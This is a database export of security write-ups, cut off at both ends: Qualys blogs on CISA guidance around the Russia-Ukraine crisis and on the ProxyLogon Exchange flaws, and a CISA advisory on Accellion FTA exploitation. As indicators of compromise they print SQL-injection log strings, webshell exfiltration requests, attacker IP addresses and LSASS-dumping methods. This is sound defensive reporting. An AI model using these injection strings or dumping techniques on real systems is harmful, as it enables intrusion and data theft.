In this amplified threat environment, the entire Qualys team is available to help our customers improve cybersecurity and resilience.\n\n* * *\n\n**Implement CISA\u2019s Shields Up Guidance**\n\n[Try it Now](<https://www.qualys.com/forms/cisa-shields-up-service/>)\n\n* * *\n\n### **Appendix:**\n\n#### CISA catalog of known exploited vulnerabilities by state attackers\n\n**CVE**| **QID**| **Title**| **Release Date**| **CVSS_V3** \n---|---|---|---|--- \nCVE-2018-13379| 43702| Fortinet Fortigate (FortiOS) System File Leak through Secure Sockets Layer (SSL) Virtual Private Network (VPN) via Specially Crafted Hypertext Transfer Protocol (HTTP) Resource Requests (FG-IR-18-384)| 9/12/2019| 9.8 \nCVE-2019-1653| 13405| Cisco Small Business RV320 and RV325 Router Multiple Security Vulnerabilities| 1/29/2019| 7.5 \nCVE-2019-2725| 87386| Oracle WebLogic Server Remote Code Execution Vulnerability (Oracle Security Alert Advisory - CVE-2019-2725)| 4/27/2019| 9.8 \nCVE-2019-7609| 371687| Kibana Multiple Security Vulnerabilities (ESA-2019-01,ESA-2019-02,ESA-2019-03)| 4/18/2019| 10 \nCVE-2019-9670| 375990| Zimbra XML External Entity Injection (XXE) Vulnerability| 8/12/2021| 9.8 \nCVE-2019-10149| 50092| Exim Remote Command Execution Vulnerability| 6/5/2019| 9.8 \nCVE-2019-11510| 38771| Pulse Connect Secure Multiple Security Vulnerabilities (SA44101)| 8/6/2019| 10 \nCVE-2019-19781| 372305| Citrix ADC And Citrix Gateway Arbitrary Code Execution Vulnerability (CTX267027)| 12/23/2019| 9.8 \nCVE-2020-0688| 50098| Microsoft Exchange Server Security Update for February 2020| 2/12/2020| 9.8 \nCVE-2020-4006| 13215| VMware Workspace One Access Command Injection Vulnerability (VMSA-2020-0027)| 12/7/2020| 9.1 \nCVE-2020-5902| 38791| F5 BIG-IP ASM,LTM,APM TMUI Remote Code Execution Vulnerability (K52145254) (unauthenticated check)| 7/5/2020| 9.8 \nCVE-2020-14882| 87431| Oracle WebLogic Server Multiple Vulnerabilities (CPUOCT2020)| 10/21/2020| 9.8 \nCVE-2021-26855, CVE-2021-26857, 
CVE-2021-26858, CVE-2021-27065 | 50107| Microsoft Exchange Server Remote Code Execution Vulnerability (ProxyLogon)| 3/3/2021| 9.8 \n \nSee the full list of [CISA known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>).\n\n#### List of IOCs related to Hermetic Wiper aka KillDisk\n\n**SHA256 Hashes** \n--- \n0385eeab00e946a302b24a91dea4187c1210597b8e17cd9e2230450f5ece21da \n06086c1da4590dcc7f1e10a6be3431e1166286a9e7761f2de9de79d7fda9c397 \n095c7fa99dbc1ed7a3422a52cc61044ae4a25f7f5e998cc53de623f49da5da43 \n0db5e5b68dc4b8089197de9c1e345056f45c006b7b487f7d8d57b49ae385bad0 \n1bc44eef75779e3ca1eefb8ff5a64807dbc942b1e4a2672d77b9f6928d292591 \n2c10b2ec0b995b88c27d141d6f7b14d6b8177c52818687e4ff8e6ecf53adf5bf \n34ca75a8c190f20b8a7596afeb255f2228cb2467bd210b2637965b61ac7ea907 \n3c557727953a8f6b4788984464fb77741b821991acbf5e746aebdd02615b1767 \n4dc13bb83a16d4ff9865a51b3e4d24112327c526c1392e14d56f20d6f4eaf382 \n7e154d5be14560b8b2c16969effdb8417559758711b05615513d1c84e56be076 \n923eb77b3c9e11d6c56052318c119c1a22d11ab71675e6b95d05eeb73d1accd6 \n9ef7dbd3da51332a78eff19146d21c82957821e464e8133e9594a07d716d892d \na196c6b8ffcb97ffb276d04f354696e2391311db3841ae16c8c9f56f36a38e92 \nb01e0c6ac0b8bcde145ab7b68cf246deea9402fa7ea3aede7105f7051fe240c1 \nb60c0c04badc8c5defab653c581d57505b3455817b57ee70af74311fa0b65e22 \nb6f2e008967c5527337448d768f2332d14b92de22a1279fd4d91000bb3d4a0fd \nc2d06ad0211c24f36978fe34d25b0018ffc0f22b0c74fd1f915c608bf2cfad15 \nd4e97a18be820a1a3af639c9bca21c5f85a3f49a37275b37fd012faeffcb7c4a \ndcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78 \ne5f3ef69a534260e899a36cec459440dc572388defd8f1d98760d31c700f42d5 \nf50ee030224bf617ba71d88422c25d7e489571bc1aba9e65dc122a45122c9321 \nfd7eacc2f87aceac865b0aa97a50503d44b799f27737e009f91f3c281233c17d \n \n#### List of MITRE ATT&CK TIDs provided by CISA\n\n**Tactic**| **Technique**| **Procedure** \n---|---|--- \nReconnaissance 
[[TA0043](<https://attack.mitre.org/versions/v10/tactics/TA0043/>)]| Active Scanning: Vulnerability Scanning [[T1595.002](<https://attack.mitre.org/versions/v10/techniques/T1595/002/>)]| Russian state-sponsored APT actors have performed large-scale scans in an attempt to find vulnerable servers. \n| Phishing for Information [[T1598](<https://attack.mitre.org/versions/v10/techniques/T1598>)]| Russian state-sponsored APT actors have conducted spearphishing campaigns to gain credentials of target networks. \nResource Development [[TA0042](<https://attack.mitre.org/versions/v10/tactics/TA0042/>)]| Develop Capabilities: Malware [[T1587.001](<https://attack.mitre.org/versions/v10/techniques/T1587/001>)]| Russian state-sponsored APT actors have developed and deployed malware, including ICS-focused destructive malware. \nInitial Access [[TA0001](<https://attack.mitre.org/versions/v10/tactics/TA0001/>)]| Exploit Public Facing Applications [[T1190](<https://attack.mitre.org/versions/v10/techniques/T1190/>)]| Russian state-sponsored APT actors use publicly known vulnerabilities, as well as zero-days, in internet-facing systems to gain access to networks. \n| Supply Chain Compromise: Compromise Software Supply Chain [[T1195.002](<https://attack.mitre.org/versions/v10/techniques/T1195/002>)]| Russian state-sponsored APT actors have gained initial access to victim organizations by compromising trusted third-party software. Notable incidents include M.E.Doc accounting software and SolarWinds Orion. \nExecution [[TA0002](<https://attack.mitre.org/versions/v10/tactics/TA0002>)]| Command and Scripting Interpreter: PowerShell [[T1059.003](<https://attack.mitre.org/versions/v10/techniques/T1059/003>)] and Windows Command Shell [[T1059.003](<https://attack.mitre.org/versions/v10/techniques/T1059/003>)]| Russian state-sponsored APT actors have used `cmd.exe` to execute commands on remote machines. 
They have also used PowerShell to create new tasks on remote machines, identify configuration settings, exfiltrate data, and execute other commands. \nPersistence [[TA0003](<https://attack.mitre.org/versions/v10/tactics/TA0003>)]| Valid Accounts [[T1078](<https://attack.mitre.org/versions/v10/techniques/T1078/>)]| Russian state-sponsored APT actors have used credentials of existing accounts to maintain persistent, long-term access to compromised networks. \nCredential Access [[TA0006](<https://attack.mitre.org/versions/v10/tactics/TA0006>)]| Brute Force: Password Guessing [[T1110.001](<https://attack.mitre.org/versions/v10/techniques/T1110/001>)] and Password Spraying [[T1110.003](<https://attack.mitre.org/versions/v10/techniques/T1110/003>)]| Russian state-sponsored APT actors have conducted brute-force password guessing and password spraying campaigns. \n| OS Credential Dumping: NTDS [[T1003.003](<https://attack.mitre.org/versions/v10/techniques/T1003/003/>)]| Russian state-sponsored APT actors have exfiltrated credentials and exported copies of the Active Directory database `ntds.dit`. \n| Steal or Forge Kerberos Tickets: Kerberoasting [[T1558.003](<https://attack.mitre.org/versions/v10/techniques/T1558/003/>)]| Russian state-sponsored APT actors have performed \u201cKerberoasting,\u201d whereby they obtained the Ticket Granting Service (TGS) Tickets for Active Directory Service Principal Names (SPN) for offline cracking. \n| Credentials from Password Stores [[T1555](<https://attack.mitre.org/versions/v10/techniques/T1555>)]| Russian state-sponsored APT actors have used previously compromised account credentials to attempt to access Group Managed Service Account (gMSA) passwords. 
\nExploitation for Credential Access [[T1212](<https://attack.mitre.org/versions/v10/techniques/T1212>)]| Russian state-sponsored APT actors have exploited Windows Netlogon vulnerability [CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) to obtain access to Windows Active Directory servers. \nUnsecured Credentials: Private Keys [[T1552.004](<https://attack.mitre.org/versions/v10/techniques/T1552/004>)]| Russian state-sponsored APT actors have obtained private encryption keys from the Active Directory Federation Services (ADFS) container to decrypt corresponding SAML signing certificates. \nCommand and Control [[TA0011](<https://attack.mitre.org/versions/v10/tactics/TA0011/>)]| Proxy: Multi-hop Proxy [[T1090.003](<https://attack.mitre.org/versions/v10/techniques/T1090/003/>)]| Russian state-sponsored APT actors have used virtual private servers (VPSs) to route traffic to targets. The actors often use VPSs with IP addresses in the home country of the victim to hide activity among legitimate user traffic.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2022-02-26T20:20:32", "type": "qualysblog", "title": "Russia-Ukraine Crisis: How to Strengthen Your Security Posture to Protect against Cyber Attack, based on CISA Guidelines", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, 
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-10149", "CVE-2019-11510", "CVE-2019-1653", "CVE-2019-19781", "CVE-2019-2725", "CVE-2019-7609", "CVE-2019-9670", "CVE-2020-0688", "CVE-2020-1472", "CVE-2020-14882", "CVE-2020-4006", "CVE-2020-5902", "CVE-2021-26855", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2022-02-26T20:20:32", "id": "QUALYSBLOG:01C65083E501A6BAFB08FCDA1D561012", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-11T20:27:44", "description": "**Update March 10, 2021**: A new section describes how to respond with mitigation controls if patches cannot be applied, as recommended by Microsoft. This section details the Qualys Policy Compliance control ids for each vulnerability.\n\n**Update March 8, 2021**: Qualys has released an additional QID: 50108 which remotely detects instances of Exchange Server vulnerable to ProxyLogon vulnerability CVE-2021-26855 without authentication. QID 50108 is available in VULNSIGS-2.5.125-3 version and above, and is available across all platforms as of March 8th, 1:38 AM ET. This QID is not applicable to agents, so the signature version for the agent will not be updated. QID: 50107, released in VULNSIGS-2.5.121-4 and Windows Cloud Agent manifest 2.5.121.4-3 and above, will accurately detect this vulnerability via agents.\n\n**Original Post**: On March 2nd, [Microsoft released](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-march-2021-exchange-server-security-updates/ba-p/2175901>) a set of out-of-band security updates to address critical remote code execution vulnerabilities in Microsoft Exchange Server. 
According to Microsoft these vulnerabilities are actively being exploited in the wild, and hence it is recommended to patch them immediately.\n\nTo detect vulnerable instances, Qualys released QID 50107 which detects all vulnerable instances of Exchange server. This QID is included in VULNSIGS-2.5.121-4 version and above.\n\nCVEs addressed as part of this QID are: CVE-2021-26412, CVE-2021-26854, CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078.\n\nAmong the above CVEs, [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>), [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>), [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>), [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>) are being actively targeted in the wild using zero-day exploits. Microsoft attributes these attacks with high confidence to the HAFNIUM (Chinese cyber spy) threat actor group. These vulnerabilities are related to the following versions of Exchange Server:\n\n * Exchange Server 2013\n * Exchange Server 2016\n * Exchange Server 2019\n\nAt the time of the security update release the vulnerabilities affect only on-premises Microsoft Exchange Server installations. Exchange online is not affected.\n\n### CVE Technical Details\n\n**[CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>)** is a Server-Side Request Forgery (SSRF) vulnerability that allows attackers to send arbitrary HTTP requests and authenticate to on-premises Exchange servers. Attackers can also trick the Exchange server to execute arbitrary commands by exploiting this vulnerability.\n\n**[CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>)** is an insecure deserialization vulnerability in the Unified Messaging service. 
Insecure deserialization is where untrusted user-controllable data is deserialized by a program. Attackers who successfully exploit this vulnerability can run their code as SYSTEM on the Exchange server. \n\n**[CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>)** is a post-authentication arbitrary file write vulnerability in Exchange. Exploiting this vulnerability could allow an attacker to write a file to any path on the target Exchange server.\n\n**[CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>)** is a post-authentication arbitrary file write vulnerability in Exchange. Similar to CVE-2021-26858, exploiting this vulnerability could allow an attacker to write a file to any path on the target Exchange server.\n\n### Attack Chain\n\nMicrosoft has provided details regarding how the HAFNIUM (threat actor) group is exploiting the above-mentioned critical CVEs. The following sequence of steps summarizes Microsoft\u2019s findings.\n\n 1. The initial step in the attack chain includes the threat actor group making an untrusted connection to the target Exchange server (on port 443) using CVE-2021-26855.\n 2. After successfully establishing the connection, the threat actor group exploits CVE-2021-26857, which gives them the ability to run code as SYSTEM on the target Exchange server. This requires administrator permission or another vulnerability to exploit.\n 3. 
As part of their post-authentication actions, the threat actor group exploits [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>) and [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>) and proceeds to write files to any path on the target server.\n\nIt has been observed that after gaining the initial access, the threat actor group deployed web shells on the compromised target server.\n\nThe following table shows the MITRE ATT&CK Technique and Tactic details.\n\n**Tactic**| **Technique**| **Sub-Technique**| **TID** \n---|---|---|--- \nReconnaissance| Gather Victim Identity Information| Email Addresses| T1589.002 \nReconnaissance| Gather Victim Identity Information| IP Addresses| T1589.005 \nResource Development| Develop Capabilities| Exploits| T1587.004 \nInitial Access| Exploit Public-Facing Application| -| T1190 \nExecution| Command and Scripting Interpreter| PowerShell| T1059.001 \nPersistence| Create Account| Domain Account| T1136.002 \nPersistence| Server Software Component| Web Shell| T1505.003 \nCredential Access| OS Credential Dumping| LSASS Memory| T1003.001 \nCredential Access| OS Credential Dumping| NTDS| T1003.003 \nLateral Movement| Remote Services| SMB/Windows Admin Shares| T1021.002 \nCollection| Archive Collected Data| Archive via Utility| T1560.001 \nCollection| Email Collection| Remote Email Collection| T1114.002 \nCollection| Email Collection| Local Email Collection| T1114.001 \nCommand and Control| Remote Access Software| -| T1219 \nExfiltration| Exfiltration over Web Service| Exfiltration to Cloud Storage| T1567.002 \n \n### Discover and Remediate the Zero-Day Vulnerabilities Using Qualys VMDR\n\n##### Identify Microsoft Exchange Server Assets\n\nThe first step in managing these critical vulnerabilities and reducing risk is identification of assets. 
[Qualys VMDR](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) makes it easy to identify Windows Exchange server systems.\n\nQuery: _operatingSystem.category:Server and operatingSystem.category1:`Windows` and software:(name:Microsoft Exchange Server)_\n\n\n\nOnce the hosts are identified, they can be grouped together with a \u2018dynamic tag\u2019, let\u2019s say \u2013 \u201cExchange Server 0-day\u201d. This helps in automatically grouping existing hosts with the 0-days as well as any new Windows Exchange server that spins up in your environment. Tagging makes these grouped assets available for querying, reporting and management throughout the [Qualys Cloud Platform](<https://www.qualys.com/cloud-platform/>).\n\n##### Discover Exchange Server Zero-Day Vulnerabilities\n\nNow that hosts running Microsoft Exchange Server are identified, you want to detect which of these assets have flagged this vulnerability. VMDR automatically detects new vulnerabilities like these based on the always updated KnowledgeBase (KB).\n\nYou can see all your impacted hosts for this vulnerability tagged with the \u2018Exchange Server 0-day\u2019 asset tag in the vulnerabilities view by using this QQL query:\n\nVMDR query: `vulnerabilities.vulnerability.qid:50107`\n\n\n\nQID 50107 is available in signature version VULNSIGS-2.5.121-4 and above and can be detected using authenticated scanning or the [Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>) manifest version 2.5.121.4-3 and above.\n\nQualys has released an additional QID: 50108 which remotely detects instances of Exchange Server vulnerable to ProxyLogon vulnerability CVE-2021-26855 without authentication. This QID is not applicable to agents. QID 50108 is available in VULNSIGS-2.5.125-3 version and above.\n\nOrganizations that use on-premises Exchange installations typically also enable Outlook Web Access (OWA), which is exposed to the internet to allow users to connect into their e-mail systems. 
It is therefore recommended organizations employ both remote and authenticated scanning methods to get the most accurate view of vulnerable assets, as using only the agent-based approach would not provide a comprehensive picture of the vulnerability exposure.\n\nWith VMDR Dashboard, you can track 'Exchange 0-day', impacted hosts, their status and overall management in real time. With trending enabled for dashboard widgets, you can keep track of the vulnerability trends in your environment using the Exchange Server 0-Day Dashboard.\n\n**Dashboard**: [Exchange Server 0-Day Dashboard | Critical Global View](<https://qualys-secure.force.com/customer/s/article/000006564>)\n\n\n\n##### Respond by Patching\n\nVMDR rapidly remediates the Windows hosts by deploying the most relevant and applicable per-technology version patches. You can simply select \u201cqid: 50107\u201d in the Patch Catalog and filter on the \u201cMissing\u201d patches to identify and deploy the applicable, available patches in one go for hosts grouped together by a tag \u2013 Exchange Server 0-day.\n\n\n\nSecurity updates are available for the following specific versions of Exchange:\n\n * [Update for Exchange Server 2019](<https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-and-2013-march-2-2021-kb5000871-9800a6bb-0a21-4ee7-b9da-fa85b3e1d23b>): Requires Cumulative Update (CU) 8 or CU 7\n * [Update for Exchange Server 2016](<https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-and-2013-march-2-2021-kb5000871-9800a6bb-0a21-4ee7-b9da-fa85b3e1d23b>): Requires CU 19 or CU 18\n * [Update for Exchange Server 2013](<https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-and-2013-march-2-2021-kb5000871-9800a6bb-0a21-4ee7-b9da-fa85b3e1d23b>): Requires CU 23\n * [Update for Exchange Server 
2010](<https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2010-service-pack-3-march-2-2021-kb5000978-894f27bf-281e-44f8-b9ba-dad705534459>): Requires SP 3 or any SP 3 RU\n * This is a defense-in-depth update.\n\nUsers are encouraged to apply patches as soon as possible.\n\n##### Respond with Mitigation Controls if Patches Cannot Be Applied\n\nWe recognize not all organizations may be able to patch their systems right away. In such scenarios Microsoft has recommended a few [interim mitigation controls](<https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vulnerabilities-mitigations-march-2021/>) to limit the exploitation of these vulnerabilities. [Qualys Policy Compliance](<https://www.qualys.com/apps/policy-compliance/>) has added controls based on these recommendations for impacted Exchange Servers 2013, 2016, and 2019. The vulnerability details and corresponding Control IDs (CIDs) are provided below.\n\n**CVE-2021-26855**: This mitigation will filter HTTPS requests that contain malicious X-AnonResource-Backend and malformed X-BEResource cookies, which were found to be used in the SSRF attacks in the wild. 
This will help with defense against the known patterns observed but not against the SSRF as a whole.\n\n * **CID 20831** - Status of match URL of rewrite rule 'X-BEResource Abort - inbound' for which action is 'AbortRequest' at site level\n * **CID 20834** - Status of match URL of rewrite rule 'X-AnonResource-Backend Abort - inbound' for which action is 'AbortRequest' at site level\n\n**CVE-2021-26857**: Disabling the UM Service will mitigate this vulnerability.\n\n * **CID 20829** - Status of 'component' installed on the MS Exchange server\n * **CID 20828** - Status of Microsoft Exchange Unified Messaging Call Router service\n * **CID 20827** - Status of Microsoft Exchange Unified Messaging service\n\n**CVE-2021-27065**: Disabling the OAB Application Pool will prevent this CVE from executing successfully, as the API will no longer respond and will return a 503 when calling OAB, which mitigates the arbitrary write exploit that occurs via OAB. After stopping the WebApp Pool you will also need to set the OabProxy Server Component state to Inactive.\n\n * **CID 20832** - Check the 'startMode' of the OAB Application Pool (MSExchangeOABAppPool)\n\n**CVE-2021-26858**: Disabling the ECP Virtual Directory will prevent this CVE from executing successfully, as the API will no longer respond and will return a 503 when calling the Exchange Control Panel (ECP).\n\n * **CID 20833** - Check the 'startMode' of the ECP Application Pool (MSExchangeECPAppPool)\n\nQualys Policy Compliance can be used to easily monitor these mitigating controls for impacted Exchange assets.\n\n\n\nDrill down into failing controls to view details and identify issues.\n\n\n\n### Post-Compromise Detection Details\n\nAfter compromising a system, an adversary can perform the following activity:\n\nUse legitimate utilities such as procdump or the rundll32 comsvcs.dll method to dump the LSASS process memory. 
Presumably, this follows exploitation via CVE-2021-26857, as these methods do need administrative privileges.\n\n\n\nUse 7-Zip or WinRAR to compress files for exfiltration.\n\n\n\nUse PowerShell-based remote administration tools such as Nishang & PowerCat to exfiltrate this data.\n\n\n\nTo maintain persistent access on compromised systems, adversaries may also create a domain user account and install ASPX- and PHP-based web shells for command and control. Information about their probable locations is given below.\n\n**Web shell paths**:\n\n`C:\\inetpub\\wwwroot\\aspnet_client\\ \nC:\\inetpub\\wwwroot\\aspnet_client\\system_web\\ \n%PROGRAMFILES%\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\ \n%PROGRAMFILES%\\Microsoft\\Exchange Server\\V14\\FrontEnd\\HttpProxy\\owa\\auth\\ \nC:\\Exchange\\FrontEnd\\HttpProxy\\owa\\auth\\`\n\n### References\n\n * https://techcommunity.microsoft.com/t5/exchange-team-blog/released-march-2021-exchange-server-security-updates/ba-p/2175901\n * https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", "cvss3": {}, "published": "2021-03-03T22:12:19", "type": "qualysblog", "title": "Microsoft Exchange Server Zero-Days (ProxyLogon) \u2013 Automatically Discover, Prioritize and Remediate Using Qualys VMDR", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-26412", "CVE-2021-26854", 
"CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27078"], "modified": "2021-03-03T22:12:19", "id": "QUALYSBLOG:479A14480548534CBF2C80AFA3FFC840", "href": "https://blog.qualys.com/category/vulnerabilities-research", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ics": [{"lastseen": "2023-09-23T07:19:01", "description": "### Summary\n\nThis joint advisory is the result of a collaborative effort by the cybersecurity authorities of Australia,[[1](<https://www.cyber.gov.au/>)] New Zealand,[[2](<https://www.ncsc.govt.nz/>)] Singapore,[[3](<https://www.csa.gov.sg/>)] the United Kingdom,[[4](<https://www.ncsc.gov.uk/>)] and the United States.[[5](<https://www.cisa.gov/>)][[6](<https://www.cisecurity.org/ms-isac/>)] These authorities are aware of cyber actors exploiting vulnerabilities in Accellion File Transfer Appliance (FTA).[[7](<https://www.accellion.com/company/press-releases/accellion-provides-update-to-recent-fta-security-incident/>)] This activity has impacted organizations globally, including those in Australia, New Zealand, Singapore, the United Kingdom, and the United States.\n\nWorldwide, actors have exploited the vulnerabilities to attack multiple federal and state, local, tribal, and territorial (SLTT) government organizations as well as private industry organizations including those in the medical, legal, telecommunications, finance, and energy sectors. According to Accellion, this activity involves attackers leveraging four vulnerabilities to target FTA customers.[[8](<https://www.accellion.com/company/press-releases/accellion-provides-update-to-recent-fta-security-incident/>)] In one incident, an attack on an SLTT organization potentially included the breach of confidential organizational data. 
In some instances observed, the attacker has subsequently extorted money from victim organizations to prevent public release of information exfiltrated from the Accellion appliance.\n\nThis Joint Cybersecurity Advisory provides indicators of compromise (IOCs) and recommended mitigations for this malicious activity. For a downloadable copy of IOCs, see: AA21-055B.stix and MAR-10325064-1.v1.stix.\n\nClick here for a PDF version of this report.\n\n### Technical Details\n\nAccellion FTA is a file transfer application that is used to share files. In mid-December 2020, Accellion was made aware of a zero-day vulnerability in Accellion FTA and released a patch on December 23, 2020. Since then, Accellion has identified cyber actors targeting FTA customers by leveraging the following additional vulnerabilities.\n\n * [CVE-2021-27101](<https://nvd.nist.gov/vuln/detail/CVE-2021-27101>) \u2013 Structured Query Language (SQL) injection via a crafted HOST header (affects FTA 9_12_370 and earlier)\n * [CVE-2021-27102](<https://nvd.nist.gov/vuln/detail/CVE-2021-27102>) \u2013 Operating system command execution via a local web service call (affects FTA versions 9_12_411 and earlier)\n * [CVE-2021-27103](<https://nvd.nist.gov/vuln/detail/CVE-2021-27103>) \u2013 Server-side request forgery via a crafted POST request (affects FTA 9_12_411 and earlier)\n * [CVE-2021-27104](<https://nvd.nist.gov/vuln/detail/CVE-2021-27104>) \u2013 Operating system command execution via a crafted POST request (affects FTA 9_12_370 and earlier)\n\nOne of the exploited vulnerabilities (CVE-2021-27101) is an SQL injection vulnerability that allows an unauthenticated user to run remote commands on targeted devices. Actors have exploited this vulnerability to deploy a webshell on compromised systems. The webshell is located on the target system in the file `/home/httpd/html/about.html` or `/home/seos/courier/about.html`. 
The webshell allows the attacker to send commands to targeted devices, exfiltrate data, and clean up logs. The clean-up functionality of the webshell helps evade detection and analysis during post incident response. The Apache `/var/opt/cache/rewrite.log` file may also contain the following evidence of compromise:\n\n * `[.'))union(select(c_value)from(t_global)where(t_global.c_param)=('w1'))] (1) pass through /courier/document_root.html`\n * `[.'))union(select(reverse(c_value))from(t_global)where(t_global.c_param)=('w1'))] (1) pass through /courier/document_root.html`\n * `['))union(select(loc_id)from(net1.servers)where(proximity)=(0))] (1) pass through /courier/document_root.html`\n\nThese entries are followed shortly by a pass-through request to `sftp_account_edit.php`. The entries are the SQL injection attempt indicating an attempt at exploitation of the HTTP header parameter `HTTP_HOST`.\n\nApache access logging shows successful file listings and file exfiltration:\n\n * `\u201cGET /courier/about.html?aid=1000 HTTP/1.1\u201d 200 {Response size}`\n * `\u201cGET /courier/about.htmldwn={Encrypted Path}&fn={encrypted file name} HTTP/1.1\u201d 200 {Response size}`\n\nWhen the clean-up function is run, it modifies archived Apache access logs `/var/opt/apache/c1s1-access_log.*.gz` and replaces the file contents with the following string:\n\n`Binary file (standard input) matches`\n\nIn two incidents, the Cybersecurity and Infrastructure Security Agency (CISA) observed a large amount of data transferred over port 443 from federal agency IP addresses to `194.88.104[.]24`. In one incident, the Cyber Security Agency of Singapore observed multiple TCP sessions with IP address `45.135.229[.]179`.\n\nOrganizations are encouraged to investigate the IOCs outlined in this advisory and in [AR21-055A](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-055a>). 
If an Accellion FTA appears compromised, organizations can get an indication of the exfiltrated files by obtaining a list of file-last-accessed events for the target files of the symlinks located in the `/home/seos/apps/1000/` folder over the period of malicious activity. This information is only indicative and may not be a comprehensive identifier of all exfiltrated files.\n\n### Mitigations\n\nOrganizations with Accellion FTA should:\n\n * Temporarily isolate or block internet access to and from systems hosting the software.\n * Assess the system for evidence of malicious activity including the IOCs, and obtain a snapshot or forensic disk image of the system for subsequent investigation.\n * If malicious activity is identified, obtain a snapshot or forensic disk image of the system for subsequent investigation, then: \n * Consider conducting an audit of Accellion FTA user accounts for any unauthorized changes, and consider resetting user passwords.\n * Reset any security tokens on the system, including the \u201cW1\u201d encryption token, which may have been exposed through SQL injection.\n * Update Accellion FTA to version FTA_9_12_432 or later.\n * Evaluate potential solutions for migration to a supported file-sharing platform after completing appropriate testing. 
\n * Accellion has announced that FTA will reach end-of-life (EOL) on April 30, 2021.[[9](<https://www.accellion.com/sites/default/files/resources/fta-eol.pdf>)] Replacing software and firmware/hardware before it reaches EOL significantly reduces risks and costs.\n\nAdditional general best practices include:\n\n * Deploying automated software update tools to ensure that third-party software on all systems is running the most recent security updates provided by the software vendor.\n * Only using up-to-date and trusted third-party components for the software developed by the organization.\n * Adding additional security controls to prevent the access from unauthenticated sources.\n\n### Resources\n\n * FireEye Blog \u2013 Cyber Criminals Exploit Accellion FTA for Data Theft and Extortion \n * [https://www.fireeye.com/blog/threat-research/2021/02/accellion-fta-exploited-for-data-theft-and-extortion.html ](<https://www.fireeye.com/blog/threat-research/2021/02/accellion-fta-exploited-for-data-theft-and-extortion.html>)\n * Center for Internet Security (CIS) Critical Security Controls for Effective Cyber Defense, known as \"CIS Controls\" \n * <https://www.cisecurity.org/controls/>\n * <https://www.cisecurity.org/ms-isac/>\n * Australia, Canada, New Zealand, the United Kingdom, and the United States Joint Advisory on Technical Approaches to Uncovering and Remediating Malicious Activity \n * <https://us-cert.cisa.gov/ncas/alerts/aa20-245a>\n * CISA and MS-ISAC\u2019s Ransomware Guide \n * <https://www.cisa.gov/sites/default/files/publications/CISA_MS-ISAC_Ransomware%20Guide_S508C.pdf>\n\n### References\n\n[[1] Australian Cyber Security Centre (ACSC)](<https://www.cyber.gov.au/>)\n\n[[2] New Zealand National Cyber Security Centre (NZ NCSC)](<https://www.ncsc.govt.nz/>)\n\n[[3] Singapore Cyber Security Agency (CSA)](<https://www.csa.gov.sg/>)\n\n[[4] United Kingdom National Cyber Security Centre (UK NCSC)](<https://www.ncsc.gov.uk/>)\n\n[[5] United States Cybersecurity and 
